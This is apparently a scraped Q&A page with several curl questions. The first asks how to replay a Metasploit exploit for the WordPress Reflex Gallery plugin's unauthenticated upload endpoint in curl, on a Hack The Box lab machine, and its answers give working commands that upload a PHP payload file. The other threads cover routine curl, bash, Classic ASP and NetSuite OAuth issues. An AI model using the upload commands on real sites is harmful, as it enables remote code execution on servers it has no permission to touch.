What's the difference between these two requests? - ruby

I'm trying to use this exploit (on HTB) without using Metasploit, but only the Ruby request works.
What's the difference between the Ruby and curl request that's causing curl not to work?
...
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
...
res = send_request_cgi({
  'uri'      => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
  'method'   => 'POST',
  'vars_get' => {
    'Year'  => "#{year}",
    'Month' => "#{month}"
  },
  'ctype'    => "multipart/form-data; boundary=#{data.bound}",
  'data'     => post_data
})
curl -F "type=application/octet-stream" -F "name=\"qqfile\"" -F "filename=\"pony.php\"" \
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'
Edit: To answer some of the questions in the comments.
So the goal is to upload a file to a website using a POST request to php.php. Using the Ruby request, the file gets uploaded successfully, but with curl the request comes back with:
No file uploaded
I assumed it was because there is a difference in the requests.
The Ruby request creates a POST request to the same server, with the same name, filename, year, and month, but it gets a different output for some reason I'm trying to figure out.
Based on the output from curl, it said that POST was implied, so I omitted it.
Hopefully this clarifies it; I'll try setting the ctype and posting the data.
I assumed -F sent the file data, but I was wrong.

As TomLord pointed out, you didn't specify the request type, which is POST.
ctype is the Content-Type request header.
You are also missing the location of the file that is being uploaded.
curl \
-X POST \
-H "Content-Type: application/octet-stream" \
-F 'name=qqfile' \
-F 'filename=random_name.php' \
-F 'data=@/path/to/pony.php' \
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'
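For reference, the Ruby snippet above attaches the payload bytes as an actual file part named qqfile (with a filename and an application/octet-stream content type), so a rough curl equivalent would upload the file itself rather than plain text fields. A sketch, untested against this target and using a hypothetical local pony.php:
curl -X POST \
-F "qqfile=@pony.php;type=application/octet-stream" \
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'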

Related

Duckling send JSON to parse method ('Need a 'text' parameter to parse' error)

I work with Duckling, which works on my local machine on port 8000 via cURL. Requests of the following type:
curl -X POST https://0.0.0.0:8000/parse -d 'locale=en_GB&text=tomorrow at eight'
executed successfully.
But when I do so:
curl -X POST https://0.0.0.0:8000/parse -H 'Content-Type: application/json' -d '{"locale": "en_GB", "text": "tomorrow at eight"}'
The HTTP 422 code is returned with the message "Need a 'text' parameter to parse".
How to correctly pass JSON to Duckling?
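If I remember Duckling's bundled example server correctly, /parse reads ordinary form-encoded parameters rather than a JSON body, which would explain the 422. A sketch that keeps the form encoding but lets curl handle the space in the text (URL as in the question):
curl -X POST https://0.0.0.0:8000/parse \
--data-urlencode 'locale=en_GB' \
--data-urlencode 'text=tomorrow at eight'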

Pass Associative Array as Data Param in POST request using cURL

I have an associative array that I want to pass to cURL as POST data. However, I have tried multiple things and it still doesn't work.
The array:
declare -A details
details[name]="Honey"
details[class]="10"
details[section]="A"
details[subject]="maths"
The cURL commands I have tried so far (all of these failed):
resp = $(cURL --request POST --data details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data variables=details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data "variables=$details" "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data "variables=${details}" "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data $details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data ${details} "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data variables=details "https://somedomain.net/getMarks")
I want the above request to end up (indirectly) like the one shown below, but I want to pass the array directly instead of writing out its contents.
resp = $(cURL --request POST --data '{"variables":[{"name": "Honey"},{"class": "10"},{"section": "A"},{"subject": "maths"}]}' "https://somedomain.net/getMarks")
Please note that to begin with I will always have the associative array ONLY (not any JSON array or string).
This question arose when I was trying to call the cURL command with the associative array as on this link (GitLab API) (the example there does not include a variables array). They mention a variables array (an array of hashes).
Since I had to use an older version of bash, which does not support the name referencing used in the answer below, I had to build the string from the associative array without passing it to a function.
Since I always had an associative array to begin with, the usual ways of passing the array as accepted by the GitLab API were:
resp=$(curl --request POST --data '{"variables":[{"name": "Honey"},{"class": "10"},{"section": "A"},{"subject": "maths"}]}' "https://somedomain.net/getMarks")
OR
resp=$(curl --request POST --data "variables[name]=Honey" --data "variables[class]=10" --data "variables[section]=A" --data "variables[subject]=maths" "https://somedomain.net/getMarks")
So I tried some tweaks on the second form, and what worked for me was:
_sep=""
_string=""
for index in "${!details[@]}"
do
    _string="${_string}${_sep}variables[${index}]=${details[$index]}"
    _sep="&"
done
resp=$(curl --request POST --data "$_string" "https://somedomain.net/getMarks")
# which indirectly was:
resp=$(curl --request POST --data "variables[name]=Honey&variables[class]=10&variables[section]=A&variables[subject]=maths" "https://somedomain.net/getMarks")
And it was a success. Thanks to @markp-fuso for giving me the intuition of creating a string with the logic in his answer.
Assumptions/understandings:
no need to list the array entries in any particular order
neither the array indices nor the values contain newlines
One bash idea:
# use a function to build the --data component
build_data() {
    local -n _arr="$1"        # use nameref so we can pass in the name of any associative array
    local _sep=""
    local _string='{"variables":['
    local _i
    for _i in "${!_arr[@]}"
    do
        _string="${_string}${_sep}{\"${_i}\": \"${_arr[$_i]}\"}"
        _sep=","
    done
    printf "%s]}" "${_string}"
}
Adding this to the curl call:
resp=$(curl --request POST --data "$(build_data details)" "https://somedomain.net/getMarks")
NOTES:
no spaces are allowed on either side of the =, i.e., resp = $(curl ...) needs to be resp=$(curl ...)
without an actual/valid URL I'm guessing a bit about if/where the escaped quotes belong, so you may need to tweak the escaped quotes to get this working correctly
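If jq is available, an alternative sketch (my own addition, not part of either answer) builds the same JSON while letting jq take care of quoting and escaping the values; it has the same bash 4.3+ nameref requirement as the function above:
build_data_jq() {
    local -n _arr="$1"    # nameref, so we can pass the name of any associative array
    local _i _json='[]'
    for _i in "${!_arr[@]}"
    do
        # append one {"key": "value"} object per entry; jq handles the escaping
        _json=$(jq --arg k "$_i" --arg v "${_arr[$_i]}" '. + [{($k): $v}]' <<< "$_json")
    done
    jq -cn --argjson v "$_json" '{variables: $v}'
}
resp=$(curl --request POST --data "$(build_data_jq details)" "https://somedomain.net/getMarks")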

curl: argument list too long

I want to send an email with an attached PDF file through the SparkPost API with a curl POST.
To insert the PDF I use (my test.pdf is ~200 KB):
"data":"'$(cat test.pdf | base64 --wrap=0)'"
But somehow this doesn't work and shows the following error:
/usr/bin/curl: Die Argumentliste ist zu lang (original)
/usr/bin/curl: Argument list is too long
EDIT:
curl command
curl -X POST https://api.eu.sparkpost.com/api/v1/transmissions -H 'Authorization: <APIKEY>' -H 'Content-Type: application/json' -d '{
  "options":{
    "open_tracking":false,
    "click_tracking":false,
    "inline_css":false
  },
  "recipients":[
    {
      "address":{
        "email":"user@domain.tld",
        "name":"user"
      }
    }
  ],
  "content":{
    "from":{
      "name":"sender",
      "email":"sender@domain.tld"
    },
    "reply_to":"replyto@domain.tld",
    "subject":"subject",
    "text":"textbody",
    "attachments":[
      {
        "name":"attachmentname.pdf",
        "type":"application/pdf",
        "data":"'$(cat test.pdf | base64 --wrap=0)'"
      }
    ]
  }
}'
This is coming up because you are trying to pass the entirety of the base64'd content on the command line. curl has the ability to load in data to POST from a file, which I'd recommend doing. More information can be found in the man page, but the basic format is this:
curl -X POST -d @filename.txt https://website.com/path
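Applied to the SparkPost call above, a rough sketch (the body.json and test.pdf.b64 file names are my own) is to write the JSON body to a file first, so the base64 blob never has to fit on the command line:
# encode the attachment once
base64 --wrap=0 test.pdf > test.pdf.b64
# write the JSON body to a file (abbreviated to the attachment-relevant parts from above)
cat > body.json <<EOF
{
  "recipients":[{"address":{"email":"user@domain.tld","name":"user"}}],
  "content":{
    "from":{"name":"sender","email":"sender@domain.tld"},
    "subject":"subject",
    "text":"textbody",
    "attachments":[
      {"name":"attachmentname.pdf","type":"application/pdf","data":"$(cat test.pdf.b64)"}
    ]
  }
}
EOF
curl -X POST https://api.eu.sparkpost.com/api/v1/transmissions \
  -H 'Authorization: <APIKEY>' \
  -H 'Content-Type: application/json' \
  -d @body.json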
According to the curl manual, the -F option can also base64-encode a file for you, but it wraps the encoded output at 76 characters per line.
Ex:
-F '=@localfile;encoder=base64'

ASP Classic parse data from curl POST -F

I have the following cURL request which points to my service:
curl -X POST \
http://go.example.com/ \
-H 'Cache-Control: no-cache' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Postman-Token: cf0c1ab5-08ff-1aa2-428e-24b855e1a61c' \
-H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
-F fff=vvvvv \
-F rrrr=ddddd \
-F xx=something
I'm trying to catch the xx parameter in Classic ASP code.
I tried 'Request("xx")' and 'Request.Form("xx")'.
Do you have any idea?
This is from the CURL documentation
-F, --form
(HTTP SMTP IMAP) For HTTP protocol family, this lets curl emulate a filled-in form in which a user has pressed the submit button. This causes curl to POST data using the Content-Type multipart/form-data according to RFC 2388.
When a form is submitted to Classic ASP using a content type of multipart/form-data, the only method available is Request.BinaryRead(), as Request.Form is for application/x-www-form-urlencoded data.
Here is a quick example of calling Request.BinaryRead() to get you started:
<%
'Should be less than configured request limit in IIS.
Const maxRequestSizeLimit = ...
Dim dataSize: dataSize = Request.TotalBytes
Dim formData
If dataSize < maxRequestSizeLimit Then
    'Read bytes into a SafeArray
    formData = Request.BinaryRead(dataSize)
    'Once you have a SafeArray it's up to you to process it.
    ...
Else
    Response.Status = "413 PAYLOAD TOO LARGE"
    Response.End
End If
%>
Parsing a SafeArray isn't easy
If you still want to use Request.Form, you can do so by specifying the form parameters in the cURL command using -d instead of -F. From the documentation:
-d, --data
(HTTP) Sends the specified data in a POST request to the HTTP server, in the same way that a browser does when a user has filled in an HTML form and presses the submit button. This will cause curl to pass the data to the server using the content-type application/x-www-form-urlencoded. Compare to -F, --form.
So the cURL command would be something like:
curl -X POST \
http://go.mytest-service.com/ \
-H 'Cache-Control: no-cache' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d fff=vvvvv \
-d rrrr=ddddd \
-d xx=something
You would then retrieve the xx parameter in Classic ASP using:
<%
Dim xx: xx = Request.Form("xx")
%>
Useful Links
application/x-www-form-urlencoded or multipart/form-data?
MSDN - Request.BinaryRead Method
Example class for parsing a SafeArray (specifically the BuildUpload() method which takes a SafeArray and parses the binary)
Example implementation of a File Uploader class using Request.BinaryRead() on Planet Source Code

Calculate OAuth signature for NetSuite restlet using bash

I'm currently trying to generate an OAuth signature for my curl request header. These point to a NetSuite restlet. Resources online are either inconclusive, too high-level for my understanding, or lacking examples. How do I go about calculating the oauth_signature value for my request?
The following is my request with credentials omitted:
curl --request GET \
--url 'https://rest.na1.netsuite.com/app/site/hosting/restlet.nl?script=foo&deploy=bar' \
--header 'Authorization: OAuth realm="'"$realm"'",oauth_consumer_key="'"$oauth_consumer_key"'",oauth_token="'"$oauth_token"'",oauth_signature_method="HMAC-SHA1",oauth_timestamp="'"$(OAuth_timestamp)"'",oauth_nonce="'"$(OAuth_nonce)"'",oauth_version="1.0",oauth_signature="'"$(OAuth_signature)"'"' \
--header 'cache-control: no-cache' \
--header 'content-type: application/json' \
| jq
Below is a list of the parameters I'm passing for the sake of readability:
params=(
oauth_consumer_key='foo'
oauth_signature_method='HMAC-SHA1'
oauth_version='1.0'
oauth_nonce=$(OAuth_nonce)
oauth_timestamp=$(OAuth_timestamp)
oauth_token='tokenfoo'
realm='4478811'
)
I am generating the timestamp and nonce like so:
OAuth_nonce () {
    md5 <<< "$RANDOM-$(date +%s.%N)" | cut -d' ' -f 1
}
OAuth_timestamp () {
    echo "$(date +%s)"
}
I got most of my resources from https://github.com/livibetter-backup/bash-oauth, but no docs exist, the examples are poor, and the library itself didn't seem to work when I tested the functions.
All the values I use in the script (confirmed they are passed correctly with bash -x) work when run in Postman, but I can't calculate an oauth_signature value outside of it.
How do I create an OAuth_signature function that returns a valid signature? What parameters will I have to pass to that function so it calculates correctly? Is it possible, or perhaps easier, to generate the signature using Perl or Python?
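For what it's worth, here is a hedged bash sketch of OAuth 1.0a HMAC-SHA1 signing with openssl. The $oauth_consumer_secret and $oauth_token_secret variables are hypothetical names for the two secrets, and the base-string rules come from the OAuth 1.0a spec rather than NetSuite's docs, so treat it as a starting point rather than a verified implementation:
percent_encode() {
    # RFC 3986 percent-encoding of a single string (ASCII input assumed)
    local s="$1" out="" c i
    for (( i = 0; i < ${#s}; i++ )); do
        c=${s:i:1}
        case "$c" in
            [A-Za-z0-9.~_-]) out+="$c" ;;
            *) printf -v c '%%%02X' "'$c"; out+="$c" ;;
        esac
    done
    printf '%s' "$out"
}
OAuth_signature() {
    # $1 = timestamp, $2 = nonce: these must be the SAME values that go into the
    # Authorization header, so generate them once and pass them in
    local ts="$1" nonce="$2"
    local method="GET"
    local base_url="https://rest.na1.netsuite.com/app/site/hosting/restlet.nl"
    # every query and oauth_* parameter except realm and the signature itself,
    # sorted by name (values here are already URL-safe; percent-encode them if not)
    local params="deploy=bar&oauth_consumer_key=${oauth_consumer_key}&oauth_nonce=${nonce}&oauth_signature_method=HMAC-SHA1&oauth_timestamp=${ts}&oauth_token=${oauth_token}&oauth_version=1.0&script=foo"
    local base_string="${method}&$(percent_encode "$base_url")&$(percent_encode "$params")"
    local key="$(percent_encode "$oauth_consumer_secret")&$(percent_encode "$oauth_token_secret")"
    local sig
    sig=$(printf '%s' "$base_string" | openssl dgst -binary -sha1 -hmac "$key" | base64)
    percent_encode "$sig"
}
# usage: compute timestamp and nonce once, then reuse the same values in the header
ts=$(OAuth_timestamp)
nonce=$(OAuth_nonce)
sig=$(OAuth_signature "$ts" "$nonce")
Note that the curl command above generates the timestamp, nonce, and signature inline with separate command substitutions; whichever approach you use, the signature has to be computed over exactly the same timestamp and nonce that end up in the Authorization header.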

Resources